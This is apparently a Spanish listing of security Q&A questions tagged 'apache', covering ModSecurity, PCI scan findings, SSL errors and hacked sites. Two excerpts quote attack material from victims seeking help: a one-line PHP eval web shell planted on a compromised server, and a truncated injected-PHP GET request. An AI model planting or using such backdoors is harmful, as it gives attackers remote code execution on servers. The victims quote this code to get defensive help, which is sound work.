Preguntas con etiqueta 'apache'

preguntas con etiqueta
2
respuestas

¿Existe una manera fácil de proteger Apache en debian?

Ejecuto un servidor web Apache con muchos sitios PHP de varios clientes. Intenté instalar apache-mod_security2 después de este tutorial (alemán) que utiliza estos conjuntos de reglas: enlace pero si lo habilito, casi todas las páginas...
hecha 04.02.2013 - 06:35
1
respuesta

Encabezado de respuesta del equilibrador de carga de AWS Apache Server Disclosure

Tengo un entorno node.js implementado utilizando AWS Elastic Beanstalk en un servidor Apache. He ejecutado un escaneo PCI en el entorno y tengo 2 fallas: Divulgación de información de Apache ServerTokens Divulgación de información del enca...
hecha 13.11.2018 - 18:06
1
respuesta

Obtención de una detección de PHISH / Zmate.omna por Avira cuando actualizo mi página, pero los escáneres de sitios web en línea muestran que la página está limpia

Cuando Avira actualizo mi página, obtengo una detección de PHISH / Zmate.omna que muestra que se colocó en el caché de Chrome. Pero probé varios escáneres de url / sitios web en línea, y todos muestran que la página está limpia. ¿Es un falso...
hecha 26.01.2018 - 08:43
1
respuesta

Obteniendo un error sospechoso en apache error.log (DJANGO)

Al utilizar django, aparece el siguiente error en mi registro de errores de apache: Invalid HTTP_HOST header: 'kyortisdzheykob.ru'. You may need to add u'kyortisdzheykob.ru' to ALLOWED_HOSTS. Pero no tengo ninguna mención de este host en ni...
hecha 17.03.2018 - 01:17
2
respuestas

¿Puede ModSecurity defenderse de ataques de fuerza bruta en PHPmyadmin y WordPress también?

¿Puede el software ModSecurity defenderse de ataques de fuerza bruta en PHPmyadmin y WordPress también? Una empresa de alojamiento particular que proporciona alojamiento compartido me dijo que ModSecurity debería cubrir PHPmyadmin y WordPress...
hecha 11.01.2018 - 06:12
3
respuestas

¿Cómo puedo determinar de dónde provino el script inyectado?

Tengo un servidor que actualmente ha sido hackeado. Se están creando archivos en mi servidor que tiene contenido de este tipo: if(isset($_REQUEST['oUS'])){/*PJEG*/eval($_REQUEST['oUS']);/*z*/exit;/*Lv*/} O como esto: <?php /*auV*...
hecha 20.07.2017 - 13:25
1
respuesta

Ejecución de funciones de PHP a través de la solicitud HTTP GET del pirata informático [duplicado]

Estamos recibiendo continuamente las siguientes solicitudes en nuestro servidor apache de los hackers ?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0); @set_magic_quotes_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SER...
hecha 20.09.2017 - 06:32
1
respuesta

Listado de directorios para iconos y carpetas de imágenes

Estoy probando la aplicación web en el servidor Apache, que permite listar directorios como enlace y enlace . Este directorio contiene solo imagenes. ¿Debo recomendar no permitir la inclusión de directorios en todos los directorios como un...
hecha 31.10.2017 - 17:13
1
respuesta

El sitio web utiliza un protocolo no compatible. ERR_SSL_VERSION_OR_CIPHER_MISMATCH

Acabo de instalar un nuevo certificado comodín en mi servidor Ubuntu (antes había un solo certificado instalado). Modifiqué /etc/apache2/sites-available/000-default.conf que es para un subdominio específico y actualicé las rutas: <VirtualHo...
hecha 17.05.2017 - 04:09
1
respuesta

La vista de Google de una página web está dañada

Recientemente, uno de mi sitio web ha sido hackeado de una manera muy interesante. Al hacer algunas investigaciones, descubrí que no fui la única afectada por el hack, pero no encontré nada al respecto. Nota: Voy a describir mi sitio web...
hecha 10.05.2017 - 13:53